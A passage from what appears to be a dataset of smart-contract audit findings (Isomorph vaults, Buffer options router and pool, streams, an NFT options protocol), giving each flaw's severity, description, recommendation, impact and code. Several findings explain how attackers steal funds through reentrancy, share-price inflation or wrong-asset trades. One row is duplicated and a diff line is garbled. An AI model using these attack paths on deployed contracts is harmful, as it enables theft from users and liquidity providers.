address(0)); //this should get caught by the collateralExists check but just to be careful\n //checks two inputs to help prevent input mistakes\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, ""Mismatched data"");\n collateralValid[_collateralAddress] = false;\n collateralPaused[_collateralAddress] = true;\n}\n```\n\nWhen a collateral is paused `collateralValid[_collateralAddress]` is set to `false`. For `Vault_Lyra` `Vault_Synths` and `Vault_Velo` this will cause `closeLoan` and `callLiquidation` to revert. 
This traps existing users and prevents liquidations which will result in bad debt for the protocol",Allow liquidations and loan closure when collateral is paused,"Outstanding loans cannot be closed or liquidated, freezing user funds and causing the protocol to take on bad debt","```\nfunction pauseCollateralType(\n address _collateralAddress,\n bytes32 _currencyKey\n ) external collateralExists(_collateralAddress) onlyAdmin {\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\n //checks two inputs to help prevent input mistakes\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, ""Mismatched data"");\n collateralValid[_collateralAddress] = false;\n collateralPaused[_collateralAddress] = true;\n}\n```\n" +increaseCollateralAmount : User is not allowed to increase collateral freely.,medium,"For all three types of vault, a user is allowed to increase collateral only if the overall collateral value is higher than the margin value.\nimo, this restriction may not be needed. 
anyway user is adding the collateral that could eventually save from liquidation.\\nProtocol will loose advantage due to this restriction.\\nCodes from lyra vault implementation :\\nLine 184\\n```\\n require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n```\\n\\nFor synth - Refer here\\nFor velo - Refer here",Allow user add collateral freely.,"User may not have the collateral all at once, but they can add like an EMI.\\nProtocol will loose the repayment anyway.\\nWhat is no one comes for liquidation - again this could lose.","```\\n require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n```\\n" +Dangerous assumption on the peg of USDC can lead to manipulations,medium,"Dangerous assumption on the peg of USDC can lead to manipulations\\nThe volatility of USDC will also affect the price of the other token in the pool since it's priced in USDC (DepositReceipt_USDC.sol#L87, DepositReceipt_USDC.sol#L110) and then compared to its USD price from a Chainlink oracle (DepositReceipt_USDC.sol#L90-L98).\\nThis issue is also applicable to the hard coded peg of sUSD when evaluating the USD price of a Synthetix collateral (Vault_Synths.sol#L76):\\n```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n\\nTogether with isoUSD not having a stability mechanism, these assumptions can lead to different manipulations with the price of isoUSD and the arbitraging opportunities created by the hard peg assumptions (sUSD and USDC will be priced differently on exchanges and on Isomorph).","Consider using the Chainlink USDC/USD feed to get the price of USDC and price liquidity using the actual price of USDC. 
Also, consider converting sUSD prices of Synthetix collaterals to USD to mitigate the discrepancy in prices between external exchanges and Isomorph.","If the price of USDC falls below $1, collateral will be priced higher than expected. This will keep borrowers from being liquidated. And it will probably affect the price of isoUSD since there will be an arbitrage opportunity: the cheaper USDC will be priced higher as collateral on Isomorph. If hte price of USDC raises above $1, borrowers' collateral will be undervalued and some liquidations will be possible that wouldn't have be allowed if the actual price of USDC was used.","```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n" +Wrong constants for time delay,medium,"This protocol uses several constants for time dealy and some of them are incorrect.\\nIn `isoUSDToken.sol`, `ISOUSD_TIME_DELAY` should be `3 days` instead of 3 seconds.\\n```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n\\nIn `CollateralBook.sol`, `CHANGE_COLLATERAL_DELAY` should be `2 days` instead of 200 seconds.\\n```\\n uint256 public constant CHANGE_COLLATERAL_DELAY = 200; //2 days\\n```\\n",2 constants should be modified as mentioned above.,Admin settings would be updated within a short period of delay so that users wouldn't react properly.,```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n +Unnecessary precision loss in `_recipientBalance()`,medium,"Using `ratePerSecond()` to calculate the `_recipientBalance()` incurs an unnecessary precision loss.\\nThe current formula in `_recipientBalance()` to calculate the vested amount (balance) incurs an unnecessary precision loss, as it includes div before mul:\\n```\\nbalance 
= elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\n```\n\nThis can be avoided and the improved formula can also save some gas.",Consider changing to:\n```\nbalance = elapsedTime_ * tokenAmount_ / duration\n```\n,Precision loss in `_recipientBalance()`.,"```\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\n```\n" +The ````Stream```` contract is designed to receive ETH but not implement function for withdrawal,medium,"The `Stream` contract instances can receive ETH but can not withdraw, ETH occasionally sent by users will be stuck in those contracts.\nShown as the test case, it can receive ETH normally.\n```\ncontract StreamReceiveETHTest is StreamTest {\n function setUp() public override {\n super.setUp();\n }\n\n function test_receiveETH() public {\n s = Stream(\n factory.createStream(\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\n )\n );\n\n vm.deal(payer, 10 ether);\n vm.prank(payer);\n (bool success, ) = address(s).call{value: 1 ether}("""");\n assertEq(success, true);\n assertEq(address(s).balance, 1 ether);\n }\n}\n```\n\nResult\n```\nRunning 1 test for test/Stream.t.sol:StreamReceiveETHTest\n[PASS] test_receiveETH() (gas: 167691)\nTest result: ok. 
1 passed; 0 failed; finished in 1.25ms\\n```\\n",Issue The `Stream` contract is designed to receive ETH but not implement function for withdrawal\\nAdd a `rescueETH()` function which is similar with the existing `rescueERC20()`,See Summary,"```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}("""");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n" +"If the recipient is added to the USDC blacklist, then cancel() does not work",medium,"cancel() will send the vested USDC to the recipient, if the recipient is added to the USDC blacklist, then cancel() will not work\\nWhen cancel() is called, it sends the vested USDC to the recipient and cancels future payments. Consider a scenario where if the payer intends to call cancel() to cancel the payment stream, a malicious recipient can block the address from receiving USDC by adding it to the USDC blacklist (e.g. by doing something malicious with that address, etc.), which prevents the payer from canceling the payment stream and withdrawing future payments\\n```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. 
payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n","Issue If the recipient is added to the USDC blacklist, then cancel() does not work\\nInstead of sending tokens directly to the payer or recipient in cancel(), consider storing the number of tokens in variables and having the payer or recipient claim it later",A malicious recipient may prevent the payer from canceling the payment stream and withdrawing future payments,"```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n" +Adverary can DOS contract by making a large number of deposits/withdraws then removing them all,high,"When a user dequeues a withdraw or deposit it leaves a blank entry in the withdraw/deposit. This entry must be read from memory and skipped when processing the withdraws/deposits which uses gas for each blank entry. An adversary could exploit this to DOS the contract. 
By making a large number of these blank deposits they could make it impossible to process any auction.\\n```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n\\nThe code above processes deposits in the order they are submitted. An adversary can exploit this by withdrawing/depositing a large number of times then dequeuing them to create a larger number of blank deposits. Since these are all zero, it creates a fill or kill scenario. Either all of them are skipped or none. If the adversary makes the list long enough then it will be impossible to fill without going over block gas limit.",Two potential solutions. The first would be to limit the number of deposits/withdraws that can be processed in a single netting. 
The second would be to allow the owner to manually skip withdraws/deposits by calling an function that increments depositsIndex and withdrawsIndex.,Contract can be permanently DOS'd,"```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n" +resolveQueuedTrades() ERC777 re-enter to steal funds,medium,"_openQueuedTrade() does not follow the “Checks Effects Interactions” principle and may lead to re-entry to steal the funds\\nThe prerequisite is that tokenX is ERC777 e.g. 
“sushi”\\nresolveQueuedTrades() call _openQueuedTrade()\\nin _openQueuedTrade() call ""tokenX.transfer(queuedTrade.user)"" if (revisedFee < queuedTrade.totalFee) before set queuedTrade.isQueued = false;\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n\\n3.if ERC777 re-enter to #cancelQueuedTrade() to get tokenX back,it can close, because queuedTrade.isQueued still equal true 4. back to _openQueuedTrade() set queuedTrade.isQueued = false 5.so steal tokenX","follow “Checks Effects Interactions”\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n+ queuedTrade.isQueued = false; \\n // Transfer the fee to the target options contract\\n IERC20 tokenX = IERC20(optionsContract.tokenX());\\n tokenX.transfer(queuedTrade.targetContract, revisedFee);\\n\\n- queuedTrade.isQueued = false; \\n emit OpenTrade(queuedTrade.user, queueId, optionId);\\n }\\n```\\n",if tokenX equal ERC777 can steal token,"```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n" +The `_fee()` function is wrongly implemented in the code,medium,"_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC 
Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDC",The `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\n,The protocol will earn fees less than expected,"```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n" +resolveQueuedTrades is intended to be non atomic but invalid signature can still cause entire transaction to revert,medium,"BufferRouter#resolveQueuedTrades and unlockOptions attempt to be non atomic (i.e. doesn't revert the transaction if one fails) but an invalid signature can still cause the entire transaction to revert, because the ECDSA.recover sub call in _validateSigner can still revert.\\n```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n\\n_validateSigner can revert at the ECDSA.recover sub call breaking the intended non atomic nature of BufferRouter#resolveQueuedTrades and unlockOptions.","Use a try statement inside _validateSigner to avoid any reverts:\\n```\\n function _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n ) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n- address recoveredSigner = ECDSA.recover(digest, signature);\\n\\n+ try ECDSA.recover(digest, signature) returns (address recoveredSigner) {\\n+ return recoveredSigner == publisher;\\n+ } else {\\n+ return false;\\n+ }\\n 
}\\n```\\n",BufferRouter#resolveQueuedTrades and unlockOptions don't function as intended if signature is malformed,"```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n" +When private keeper mode is off users can queue orders with the wrong asset,high,"After an order is initiated, it must be filled by calling resolveQueuedTrades. This function validates that the asset price has been signed but never validates that the asset being passed in matches the asset of the queuedTrade. When private keeper mode is off, which is the default state of the contract, this can be abused to cause huge loss of funds.\\n```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n ""Router: Signature didn't match""\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n 
queuedTrade.user,\\n currentParams.queueId,\\n ""Wait time too high""\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n\\nBufferRouter#resolveQueueTrades never validates that the asset passed in for params is the same asset as the queuedTrade. It only validates that the price is the same, then passes the price and queueId to _openQueuedTrade:\\n```\\nfunction _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n QueuedTrade storage queuedTrade = queuedTrades[queueId];\\n IBufferBinaryOptions optionsContract = IBufferBinaryOptions(\\n queuedTrade.targetContract\\n );\\n\\n bool isSlippageWithinRange = optionsContract.isStrikeValid(\\n queuedTrade.slippage,\\n price,\\n queuedTrade.expectedStrike\\n );\\n\\n if (!isSlippageWithinRange) {\\n _cancelQueuedTrade(queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n queueId,\\n ""Slippage limit exceeds""\\n );\\n\\n return;\\n }\\n\\n // rest of code\\n\\n optionParams.totalFee = revisedFee;\\n optionParams.strike = price;\\n optionParams.amount = amount;\\n\\n uint256 optionId = optionsContract.createFromRouter(\\n optionParams,\\n isReferralValid\\n );\\n```\\n\\nInside _openQueuedTrade it checks that the price is within the slippage bounds of the order, cancelling if its not. Otherwise it uses the price to open an option. According to documentation, the same router will be used across a large number of assets/pools, which means the publisher for every asset is the same, given that router only has one publisher variable.\\nExamples:\\nImagine two assets are listed that have close prices, asset A = $0.95 and asset B = $1. An adversary could create an call that expires in 10 minutes on asset B with 5% slippage, then immediately queue it with the price of asset A. $0.95 is within the slippage bounds so it creates the option with a strike price of $0.95. 
Since the price of asset B is actually $1 the adversary will almost guaranteed make money, stealing funds from the LPs. This can be done back and forth between both pools until pools for both assets are drained.\\nIn a similar scenario, if the price of the assets are very different, the adversary could use this to DOS another user by always calling queue with the wrong asset, causing the order to be cancelled.",Pass the asset address through so the BufferBinaryOptions contract can validate it is being called with the correct asset,Adversary can rug LPs and DOS other users,"```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n ""Router: Signature didn't match""\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n ""Wait time too high""\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n" +Early depositors to BufferBinaryPool can manipulate exchange rates to steal funds from later depositors,high,"To 
calculate the exchange rate for shares in BufferBinaryPool it divides the total supply of shares by the totalTokenXBalance of the vault. The first deposit can mint a very small number of shares then donate tokenX to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalTokenXBalance, which leaves it vulnerable to exchange rate manipulation. As an example, assume tokenX == USDC. An adversary can mint a single share, then donate 1e8 USDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 USDC) will suffer from precision loss and the attackers share will benefit from it.",Require a small minimum deposit (i.e. 1e6),Adversary can effectively steal funds from later users through precision loss,```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n +"When tokenX is an ERC777 token, users can bypass maxLiquidity",medium,"When tokenX is an ERC777 token, users can use callbacks to provide liquidity exceeding maxLiquidity\\nIn BufferBinaryPool._provide, when tokenX is an ERC777 token, the tokensToSend function of account will be called in tokenX.transferFrom before sending tokens. 
When the user calls provide again in tokensToSend, since BufferBinaryPool has not received tokens at this time, totalTokenXBalance() has not increased, and the following checks can be bypassed, so that users can provide liquidity exceeding maxLiquidity.\\n```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n```\\n","Change to\\n```\\n function _provide(\\n uint256 tokenXAmount,\\n uint256 minMint,\\n address account\\n ) internal returns (uint256 mint) {\\n// Add the line below\\n bool success = tokenX.transferFrom(\\n// Add the line below\\n account,\\n// Add the line below\\n address(this),\\n// Add the line below\\n tokenXAmount\\n// Add the line below\\n );\\n uint256 supply = totalSupply();\\n uint256 balance = totalTokenXBalance();\\n\\n require(\\n balance // Add the line below\\n tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n\\n if (supply > 0 && balance > 0)\\n mint = (tokenXAmount * supply) / (balance);\\n else mint = tokenXAmount * INITIAL_RATE;\\n\\n require(mint >= minMint, ""Pool: Mint limit is too large"");\\n require(mint > 0, ""Pool: Amount is too small"");\\n\\n// Remove the line below\\n bool success = tokenX.transferFrom(\\n// Remove the line below\\n account,\\n// Remove the line below\\n address(this),\\n// Remove the line below\\n tokenXAmount\\n// Remove the line below\\n );\\n```\\n",users can provide liquidity exceeding maxLiquidity.,"```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n ""Pool has already reached it's max limit""\\n );\\n```\\n" +Limited support to a specific subset of ERC20 tokens,medium,"Buffer contest states 'any ERC20 supported', therefore it should take into account all the different ways of signalling success and failure. This is not the case, as all ERC20's transfer(), transferFrom(), and approve() functions are either not verified at all or verified for returning true. 
As a result, depending on the ERC20 token, some transfer errors may result in passing unnoticed, and/or some successfull transfer may be treated as failed.\\nCurrently the only supported ERC20 tokens are the ones that fulfill both the following requirements:\\nalways revert on failure;\\nalways returns boolean true on success.\\nAn example of a very well known token that is not supported is Tether USD (USDT).\\n👋 IMPORTANT This issue is not the same as reporting that ""return value must be verified to be true"" where the checks are missing! Indeed such a simplistic report should be considered invalid as it still does not solve all the problems but rather introduces others. See Vulnerability Details section for rationale.\\nTokens have different ways of signalling success and failure, and this affect mostly transfer(), transferFrom() and approve() in ERC20 tokens. While some tokens revert upon failure, others consistently return boolean flags to indicate success or failure, and many others have mixed behaviours.\\nSee below a snippet of the USDT Token contract compared to the 0x's ZRX Token contract where the USDT Token transfer function does not even return a boolean value, while the ZRX token consistently returns boolean value hence returning false on failure instead of reverting.\\nUSDT Token snippet (no return value) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = 
balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n\\nZRX Token snippet (consistently true or false boolean result) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) returns (bool) {\\n if (balances[_from] >= _value && allowed[_from][msg.sender] >= _value && balances[_to] + _value >= balances[_to]) {\\n balances[_to] += _value;\\n balances[_from] -= _value;\\n allowed[_from][msg.sender] -= _value;\\n Transfer(_from, _to, _value);\\n return true;\\n } else { return false; }\\n}\\n```\\n","To handle most of these inconsistent behaviors across multiple tokens, either use OpenZeppelin's SafeERC20 library, or use a more reusable implementation (i.e. library) of the following intentionally explicit, descriptive example code for an ERC20 transferFrom() call that takes into account all the different ways of signalling success and failure, and apply to all ERC20 transfer(), transferFrom(), approve() calls in the Buffer contracts.\\n```\\nIERC20 token = whatever_token;\\n\\n(bool success, bytes memory returndata) = address(token).call(abi.encodeWithSelector(IERC20.transferFrom.selector, sender, recipient, amount));\\n\\n// if success == false, without any doubts there was an error and callee reverted\\nrequire(success, ""Transfer failed!"");\\n\\n// if success == true, we need to check whether we got a return value or not (like in the case of USDT)\\nif (returndata.length > 0) {\\n // we got a return value, it must be a boolean and it should be true\\n require(abi.decode(returndata, (bool)), ""Transfer failed!"");\\n} else {\\n // since we got no return value it can be one of two cases:\\n // 1. the transferFrom does not return a boolean and it did succeed\\n // 2. 
the token address is not a contract address therefore call() always return success = true as per EVM design\\n // To discriminate between 1 and 2, we need to check if the address actually points to a contract\\n require(address(token).code.length > 0, ""Not a token address!"");\\n}\\n```\\n","Given the different usages of token transfers in BufferBinaryOptions.sol, BufferBinaryPool.sol, and BufferRouter.sol, there can be 2 types of impacts depending on the ERC20 contract being traded.\\nThe ERC20 token being traded is one that consistently returns a boolean result in the case of success and failure like for example 0x's ZRX Token contract. Where the return value is currently not verified to be true (i.e.: #1, #2, #3, #4, #5, #6) the transfer may fail (e.g.: no tokens transferred due to insufficient balance) but the error would not be detected by the Buffer contracts.\\nThe ERC20 token being traded is one that do not return a boolean value like for example the well knonw Tether USD Token contract. 
Successful transfers would cause a revert in the Buffer contracts where the return value is verified to be true (i.e.: #1, #2, #3, #4) due to the token not returing boolean results.\\nSame is true for appove calls.","```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n" +The `_fee()` function is wrongly implemented in the code,medium,"_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDC",The `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\n,The protocol will earn fees less than expected,"```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n" +Bulls that are unable to receive NFTs will not be able to claim them later,medium,"A lot of care has been taken to ensure 
that, if a bull has a contract address that doesn't accept ERC721s, the NFT is saved to `withdrawableCollectionTokenId` for later withdrawal. However, because there is no way to withdraw this token to a different address (and the original address doesn't accept NFTs), it will never be able to be claimed.\\nTo settle a contract, the bear calls `settleContract()`, which sends their NFT to the bull, and withdraws the collateral and premium to the bear.\\n```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n\\nIn order to address the case that the bull is a contract that can't accept NFTs, the protocol uses a try-catch setup. 
If the transfer doesn't succeed, it transfers the NFT into the contract, and sets `withdrawableCollectionTokenId` so that the specific NFT is attributed to the bull for later withdrawal.\\nHowever, assuming the bull isn't an upgradeable contract, this withdrawal will never be possible, because their only option is to call the same function `safeTransferFrom` to the same contract address, which will fail in the same way.\\n```\\nfunction withdrawToken(bytes32 orderHash, uint tokenId) public {\\n address collection = matchedOrders[uint(orderHash)].collection;\\n\\n address recipient = withdrawableCollectionTokenId[collection][tokenId];\\n\\n // Transfer NFT to recipient\\n IERC721(collection).safeTransferFrom(address(this), recipient, tokenId);\\n\\n // This token is not withdrawable anymore\\n withdrawableCollectionTokenId[collection][tokenId] = address(0);\\n\\n emit WithdrawnToken(orderHash, tokenId, recipient);\\n}\\n```\\n","There are a few possible solutions:\\nAdd a `to` field in the `withdrawToken` function, which allows the bull `to` withdraw the NFT `to` another address\\nCreate a function similar `to` `transferPosition` that can be used `to` transfer owners of a withdrawable NFT\\nDecide that you want `to` punish bulls who aren't able `to` receive NFTs, in which case there is no need `to` save their address or implement a `withdrawToken` function","If a bull is a contract that 